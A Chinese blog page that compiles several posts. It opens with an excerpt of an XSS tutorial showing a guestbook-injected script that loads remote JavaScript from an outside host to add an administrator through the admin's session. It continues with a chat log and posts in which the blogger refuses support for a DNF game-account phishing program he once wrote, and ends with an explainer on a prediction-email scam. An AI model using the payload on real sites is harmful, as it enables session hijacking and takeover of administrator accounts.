作者:cnryan
来源:http://hi.baidu.com/cnryan

以往对XSS的利用大多数都是针对于挂马，钓鱼，盗cookie等，这些方式并没有真正发挥到XSS的作用，因为很少人能了解XSS的实质，会话劫持，浏览器劫持，XSS能做到的东西远远超乎我们的想象。

一 XSS下提升权限
随着AJAX技术在许多大型SNS网站的应用，XSS也变得愈加流行，在XSS场景下运用AJAX能更有效地发挥它的作用。
用户输入的地方最容易滋生XSS，譬如留言、评论等表单，我搭建了一个sdbook的留言本，因为sdbook没有对用户输入的变量作出合适的过滤，导致一个XSS的产生。
留言率先传递给管理员，当作javascript劫持，我们就可以利用管理员的权限做任何事情，例如添加一个管理员。

在留言内容输入跨站代码：

1

<script>s=document.createElement("script");s.src="http://www.xss.com/xss.js";document.getElementsByTagName("head")[0].appendChild(s);</script>

这段代码用来加载远程的JS，而xss.js的内容是利用xmlHttp对象发送一个异步请求，通过XMLHTTP无刷新提交到服务器端，模拟添加一个管理员。
Read the rest of this entry

丫, 我好像不欠别人的吧,希望和我聊天的这位朋友,和抱有这种态度的朋友,或有不好动机的朋友还是别用这个,让他慢慢消失吧...唉,郁闷...该死的DNF,该死的钓鱼站....

此人已删!

消息记录================================================================
消息分组:我的好友
================================================================
消息对象:一杯红酒
================================================================

2009-4-27 17:17:51 Oyleme
找我有事/

2009-4-27 17:17:57 Oyleme
?

2009-4-27 17:19:32 一杯红酒
对了，你做的那个DNF的钩鱼程序喔，怎么改登陆提交成字母和数字在一起的呀。。。怎都搞不懂

2009-4-27 17:19:57 Oyleme
我不提供这个服务

2009-4-27 17:20:03 Oyleme
不好意思

2009-4-27 17:20:09 一杯红酒
改了，数字库接收都不显示这怅号的，郁闷

2009-4-27 17:20:18 一杯红酒
我只是请教

2009-4-27 17:20:17 Oyleme
闭关升级呐，有事留言·稍后回你！

2009-4-27 17:20:32 一杯红酒
- -哎

2009-4-27 17:20:49 Oyleme
这个程序所有问题不回答

2009-4-27 17:21:24 一杯红酒
我知道，你怕别人改的你东西嘛，或是拿去做坏事呗。。

2009-4-27 17:21:37 一杯红酒
我只是想做网站改改练习而以

2009-4-27 17:21:39 Oyleme
[表情]不怕改,会改随便改

2009-4-27 17:21:59 Oyleme
做不做坏事就和我无关了.我权管别人

2009-4-27 17:22:11 一杯红酒
我是不会改那个数字库啦，。怎改都没用，郁闷

2009-4-27 17:22:22 Oyleme
再去试试吧

2009-4-27 17:22:55 一杯红酒
试不了啊，都试了两天两夜了，都在找工具改，就是改不了，改了东西，收到密码收不到怅号

2009-4-27 17:22:57 一杯红酒
郁闷

2009-4-27 17:23:24 一杯红酒
收到的怅号是空的，，闷死

2009-4-27 17:23:44 一杯红酒
我不是做什么坏事，只是研究，我刚学呐 Read the rest of this entry

唉,又是DNF钓鱼,曾经写过一个这样的东西.谁想到现在搞的乱有人加我...

这程序的来源不定,有些是花钱买的,有的是别人提供的.不过不管杂说这东西都不是啥好东西呗.何苦来的,盗别人的号不是一件好事,劝那些有心者小心....

本来写了段文字打算说这事的,不过后来好像服务器上PHP出问题,没保存成功,晕了....简要说一下

今天有人加我,说是花了200买了这程序,看到里面有我信息,加的我,问这程序是不是别人拿我程序改的,说真的,以前真不想承认这是出自我手,不过感觉这样有点太不负责了,这程序的确出自我手,是以前一个老客户找我定做的,只是当时对钓鱼站的概念不太清楚,就没太在意,他的站放在韩国服务器上面,后来是被空间商拿去出售了,先BS一下这空间商,另也说明大家以后买空间要小心,不然可能你的代码网上比比皆是,版权面目全非,最后还以为是别人改你的程序改出来的...

前段时间有人加我说这事,只是后来都是聊几句,说明自己不搞这个业务哦,不了了之,不过,不断的有人来加你聊这个事,也让人郁闷了点,更有那些花了钱的,得之有人放出这程序后非常郁闷,嘎....

有些话想说:

1、此程序纯属以前的无聊之作。不负责技术支持。。

2、劝那些做钓鱼站的朋友们小心些，这东西现在也犯法哦。。

3、本人承接程序开发，网站代码安全性分析等和网站有关的服务。犯法的事就算了，嘿嘿。。。

4、本人技术一般，没有收徒弟的能力，不过欢迎有技术的朋友指教。

暂时这些吧，想到在加，还要去看资料。。。。。

一个DNF钓鱼站的版权信息,还有就是有人故意放出..搞的乱有人加我...

郁闷了,最近N多人加我说DNF钓鱼的事,让我帮忙改东西的.付费叫我做的,让我收他当徒弟的都有.

晕唉,我自己都没多少水,杂教人,这东西现在犯法呗,劝那些专门搞DNF工作室,钓鱼的,或类似站的朋友小心点吧.

如果你要真的想学东西.不要报着学黑客编程的路走,语言只是一种工具,要看学的人杂去用他,可能为别人提供了方便,也可能成为一把杀人的刀哦...

反思中,好好学习吧,本人不接受DNF,或钓鱼这些和法律抵处的相关业务,只做网站和应用软件的程序开发,黑客,破解,这些纯属个人兴趣,不提供服务.....

在鬼仔’s Blog看到的,是他从http://hi.baidu.com/monyer转来的,下面的转载就写原作者地址吧….这样的事可能就发生在我们的身边,而且有不少人被欺骗成功了,如果你被骗了,那不能说明你很笨,只能说骗子采用的心理学技术很成功…

有个例子，我也不记得以前说过没有。

钓鱼式攻击是什么东西呢？其实很简单：

某人Email给你：给我500块，预知你的未来，可以提前通知你，明天国王跟火箭队的比赛，火箭队会赢！

你当然不信啦，但是第二天的比赛，火箭队真的赢了，你说：巧合，巧合而已。

过了几天，他又email给你：给我500快，预知你的未来，可以提前通知你，明天湖人跟火箭队的比赛，湖人赢了。

你有点好奇，但你是绝对不会把钱给他的，但是第二天的比赛，湖人真赢了，你说：诶？难道是潜规则？

又过了几天，他又email给你：给我500快，预知你的未来，可以提前通知你，明天湖人跟七六人队的比赛，湖人赢了。

你开始猜，是不是真的啊？但第二天的比赛，湖人又赢了。

......

经过若干次循环后，你终于想要预知你的未来了。但是当你把钱汇出去没有得到答复时，你才知道上当了！

因为事情是这样的：

第一次发信8192封，一半说国王赢，一般说火箭赢；

第二次只给说火箭赢的4096人发信，分为2048人为湖人赢，2048为火箭赢；

第三次只给说湖人赢的2048人发信，分为1024人为湖人赢，1024为七六人赢；

......

很有可能他最终欺骗到的人只有10，但是这已经足够！

所以你可以说钓鱼式攻击一点技术含量都没有，不过可能你仍会因此被骗。

另外钓鱼者超多，请小心诱饵！